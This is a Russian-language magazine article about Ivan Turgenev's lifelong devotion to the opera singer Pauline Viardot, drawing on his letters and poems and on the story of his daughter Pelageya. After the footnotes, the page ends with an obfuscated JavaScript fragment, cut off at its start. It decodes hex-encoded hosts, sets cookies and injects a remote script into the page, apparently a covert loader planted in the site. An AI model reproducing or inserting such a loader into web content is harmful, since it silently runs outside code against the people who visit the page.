Тургенев и Полина Виардо. История Любви (Ю.Гришина)

Тургенев и Полина Виардо. История Любви (Ю.Гришина)

<dl class="article-info">Подробности Категория: №3 Вести март 2016г. Просмотров: 115</dl>

Он + Она

<hr/>
  Два Великих Начала, два Знака Вечности — Инь и Ян — мужчина и женщина, создают неповторимое полотно жизни, вытканное причудливыми узорами судеб человеческих. И вплетаются в эти судьбы многочисленные истории любви, словно россыпи самоцветов. Одни — яркие, сверкающие, словно бриллианты, другие — хамелеоны, меняющие свою окраску от освещения, от условий, третьи — и вовсе чёрные … Печаль и радость, страдания и счастье — все оттенки чувств, страстей, эмоций, сплетаются в многоцветное полотно.  

Мы учимся в этом водовороте чувств, страстей и эмоций делать свой выбор, учимся через опыт, «сын ошибок трудных», различать добро и зло, истину и ложь, учимся проявлять и принимать любовь.

Любовь! Кто в состоянии точно определить, что это такое? «Любовь — это бесценный дар. Это единственная вещь, которую мы можем подарить, и всё же она у тебя остаётся», — говорил Л.Н. Толстой. «Любовь — начало и конец нашего существования. Без любви нет жизни. Поэтому-то любовь есть то, перед чем преклоняется мудрый человек», — высказывал своё мнение Конфуций.

«Любовь сильнее смерти и страха смерти. Только ею, только любовьюдержится и движется жизнь» — это слова нашего соотечественника, писателя, которого уже при жизни считали почти классиком. Иван Сергеевич Тургенев имел всё основания произнести эти слова, ибо любовь свою он пронёс через всю жизнь, испытывая и минуты счастья, находясь рядом с любимой, и периоды страданий без неё, и горечь от сознания того, что живёт «на краешке чужого гнезда» в роли вечного друга семьи… Но такова была сила его любви.

Знаменитая французская оперная певица Полина Виардо была, по выражению современников, «роковой женщиной». Она не обладала привлекательной внешностью: была сутула, с крупными чертами лица и большим ртом, но, когда она начинала петь, всё её существо необычайно преображалось, а страстное пение настолько завораживало слушателей, что они совершенно переставали замечать её недостатки.

В салонах, на музыкальных вечерах она покоряла слушателей прекрасной игрой на рояле — в юности брала уроки у самого Ференца Листа. А первым её учителем был отец, испанский певец и педагог Мануэль Гарсиа-старший.

С будущим мужем, Луи Виардо, искусствоведом, критиком, композитором и директором парижской Итальянской оперы, юную певицу познакомила писательница Жорж Санд, очарованная пением Полины, которая в 16 лет дала свой первый концерт в Брюсселе. Через два года, в 1839-м, она уже дебютировала в роли Дездемоны в опере «Отелло» Россини в Лондоне. Вскоре, в 1840 году, состоялся брак Полины и Луи Виардо, который был старше своей избранницы на 21 год. Но разница в возрасте не помешала их взаимной симпатии и нежным чувствам. Более того, влюблённый муж вплотную занялся карьерой Полины.

Осенью 1843 года Полина Виардо вместе с парижской Итальянской оперой приехала на гастроли в Санкт-Петербург. Именно здесь её впервые увидел молодой начинающий литератор Иван Тургенев, которому едва исполнилось 25 лет. Зачарованный пением, Тургенев с волнением следит за каждым движением Виардо в роли Розины из «Севильского цирюльника». Он буквально сражён. С этого момента его жизнь разделилась на «до» и «после» этой встречи. Их познакомили, а спустя несколько лет он напишет своей возлюбленной: «Я ходил сегодня взглянуть на дом, где я впервые семь лет тому назад имел счастье говорить с вами. Дом этот находится на Невском, напротив Александринского театра; ваша квартира была на самом углу, — помните ли вы? Во всей моей жизни нет воспоминаний более дорогих, чем те, которые относятся к вам... я стал уважать себя с тех пор, как ношу в себе это сокровище…»*.

Мать И.С. Тургенева, узнав об увлечении сына, была разгневана, хотя и она, услышав пение примадонны, вынуждена была признать: «Хорошо поёт, проклятая цыганка!» Но тем не менее запретила при себе даже имя Полины упоминать. А Иван тем временем, узнав, что чета Виардо, закончив гастроли в России, уезжает в Париж, увольняется со службы и едет за ними, чтобы и там быть полезным своей возлюбленной.

Понимая, что Полина счастлива в замужестве, он ничего не требует в ответ на свою любовь, довольствуясь тем, что может видеть её, слышать её голос и быть хоть чем-то полезным. Он с великой охотой учил её русскому языку, который требовался ей для безупречного исполнения романсов Глинки, Даргомыжского и Чайковского. Этот язык был шестым в арсенале певицы и позже помог ей стать первой слушательницей тургеневских произведений.

Но и Полина не оставалась в долгу — она была советчиком и критиком его работ, а её положение в обществе и обширные связи представляли писателя в лучшем свете. Ведь Полина Виардо не только была известной певицей, но и находилась в центре артистической, художественной и литературной жизни Парижа. Среди её поклонников и друзей были такие выдающиеся личности, как Берлиоз, Гуно, Делакруа, Жорж Санд, Золя, Лист, Сен-Санс, Флобер, Чайковский, Шопен. Популярность Тургенева росла, и уже никто не считал его начинающим писателем.

С Луи Виардо Иван Сергеевич нашёл общий язык: оба страстно любили охоту, литературу, Луи помогал Ивану Сергеевичу с переводом книг русских писателей, а позднее и книг самого Тургенева на французский язык. Он, казалось, не замечал влюблённости русского писателя. Полностью полагаясь на благоразумие своей жены, он не изводил её ревностью и подозрениями, хотя Тургенев часто бывал в семейной усадьбе Виардо — Куртавнеле, что под Парижем. Писатель активно принимал участие в домашних спектаклях, артистических вечерах, просто приходил в гости. Он стал почти членом семейства Виардо, возился с детьми, помогал им материально, хотя сам находился в стеснённых финансовых обстоятельствах.

Биографы с разных сторон, чуть ли не под микроскопом, рассматривали жизнь знаменитого писателя, его страстную, всеобъемлющую и жертвенную любовь, вчитывались в его письма, в переписку с друзьями и негодовали, и не понимали такой любви. А Ивану Сергеевичу нужна была именно такая любовь — тихой и спокойной он долго не выдерживал: ведь не раз пытался он завести семью, но всё время безуспешно. Ему нужна была только Полина, только она безраздельно господствовала в его сердце. Бытует мнение, что сама Полина не любила Тургенева, а только позволяла себя любить. Так ли это на самом деле? Да, они не могли соединиться в данном воплощении вместе, в одну гармоничную семью. Но смог бы Тургенев стать тем, кем он стал, если бы жизнь сложилась «удачно» с нашей, земной точки зрения? Смог бы он создать целую галерею незабываемых образов, не пройдя эту школу жизни?

Ценил бы он так самуЛюбовь, почивай на лаврах счастливой безмятежной жизни? Вряд ли. А чтолюбовь была без взаимности — это тоже вопрос. Я вчитываюсь в поэтические строки Тургенева… и не верю, что Полина не любила: 

Когда так радостно, так нежно
Глядела ты в глаза мои,
И лобызал я безмятежно
Ресницы длинные твои,

Когда, бывало, ты стыдливо
Задремлешь на груди моей,
И я любуюсь боязливо
Красой задумчивой твоей.

Когда луна над пышным садом
Взойдёт, и мы с тобой сидим
Перед окном беспечно рядом,
Дыша дыханием одним…

 Личная жизнь И.С. Тургенева так и не сложилась, хотя он несколько раз пытался обзавестись семьёй. Но каждый раз его с новой силой охватывала тоска по возлюбленной, которая заставляла бросать всё и мчаться за Полиной при первом же её зове.

В одном из своих писем к Полине он пишет: «Ах, мои чувства к вам слишком велики и могучи. Я не могу жить вдали от вас, я должен чувствовать вашу близость, наслаждаться ею. День, когда мне не светили ваши глаза, — день потерянный»**.

А между тем на родине у писателя — в Спасском-Лутовинове — росла его собственная внебрачная дочь Пелагея, рождённая от красавицы белошвейки Авдотьи Ивановой. Тургенев поселил девочку в своём имении и намеревался дать ей хорошее воспитание. Но возникшая любовь к Полине Виардо изменила всё.

Когда в 1850 году обстоятельства вынудили писателя приехать в родное имение, дочери Тургенева было уже 8 лет. В родном доме он обнаружил, что его дочь — маленькая Пелагея — в имении бабушки несчастна. Варвара Петровна обращалась с ней очень грубо и жестоко, так, как если бы та была крепостной.

О своих страхах Тургенев рассказал Полине Виардо: «Моя собственная 8-летняя дочь говорит: «Я никому не верю и никого не люблю, потому что меня никто не любит». Знаменитая певица сразу же ответила: «Присылайте её ко мне, она будет моей дочерью». Иван Сергеевич увёз девочку во Францию, где она воспитывалась с детьми Виардо. Пелагея навсегда покинула Россию.

В семье Виардо её приняли благожелательно, и через некоторое время безграмотная крестьянская девочка стараниями мадам Виардо превратилась в мадемуазель Полинетт, так стал называть Тургенев Пелагею в честь Виардо. Она научилась хорошо рисовать, играть на фортепиано, говорить и писать по-французски, но к Полине Виардо никогда не испытывала тёплых чувств, хотя в семье к девочке относились как к родной. Воспитанница ревновала к чужой женщине, навязанной ей в качестве приёмной матери, считая, что Полина отняла у неё любовь и внимание отца. Для Тургенева же Полина стала ещё и ангелом милосердия, избавившим его ребёнка от рук жестокой бабушки.

В 1863 году певица покинула большую сцену, и семья Виардо со своими детьми и дочерью Тургенева переехала в Баден-Баден. Здесь Полина хотела открыть музыкальные классы, заняться любимым делом вдали от суеты Парижа. Вскоре в этот курортный городок приехал и Тургенев.

Он много работал, путешествовал по Европе, но, главное, находился рядом с любимой женщиной, его вдохновительницей. Здесь он написал повесть «Призраки» и нашумевший роман «Дым». И конечно, первым его слушателем и критиком была Полина. «Ни одна строка Тургенева не попадала в печать прежде, чем он не познакомил меня с нею. Вы, русские, не знаете, насколько вы обязаны мне, что Тургенев продолжает писать и работать»**, — говорила Полина. Как-то Тургенев посетовал: «Судьба не послала мне собственного моего семейства, и я прикрепился, вошел в состав чуждой семьи, и случайно выпало, что это семья французская. С давних пор моя жизнь переплелась с жизнью этой семьи. Там на меня смотрят не как на литератора, а как на человека, и среди нее мне спокойно и тепло»**.

В 1879 году, когда Тургеневу было уже за 60, он делает последнюю попытку обзавестись семьёй. Молодая актриса Мария Савинова, несмотря на огромную разницу в возрасте, готова стать для Ивана Сергеевича спутницей жизни. Поездка в Париж в 1882 году поставила точку в их отношениях — в доме Тургенева каждая мелочь напоминала о Полине Виардо. Для Марии это было невыносимо. В том же году Тургенев тяжело заболел, а в апреле следующего года он просит проводить его после госпиталя к Полине. Здесь он диктует ей последние рассказы и письма. И хотя срок его жизни подходил к концу, Иван Сергеевич был по своему счастлив — рядом с ним та, которую он любил больше всего на свете, его Полина. Умирающий Тургенев, увидев склонившуюся над ним Полину, скажет: «Вот царица из цариц. Сколько добра она сделала!»

«…После смерти Полины Виардо в её столике нашли рукопись Ивана Сергеевича Тургенева, которая называлась «Тургенев. Жизнь для искусства». Рассказывают, что речь в ней шла о том, как эти два любящих друг друга человека все свои чувства, мысли, страдания, скитания мятущихся душпереплавляли в искусство. Роман пропал. Весь XX век пытались найти его в странах Европы. И не только Европы. Но пока безуспешно…»**

Юлия ГРИШИНА

*Любовь в письмах выдающихся людей XVIII и XIX века. И.С. Тургенев — Полине Виардо. 
**
Александр Попов. Любовь, длиною в жизнь… Тургенев и Виардо

 

 
 
 
 

<script type="text/javascript">// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "maxpark.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script>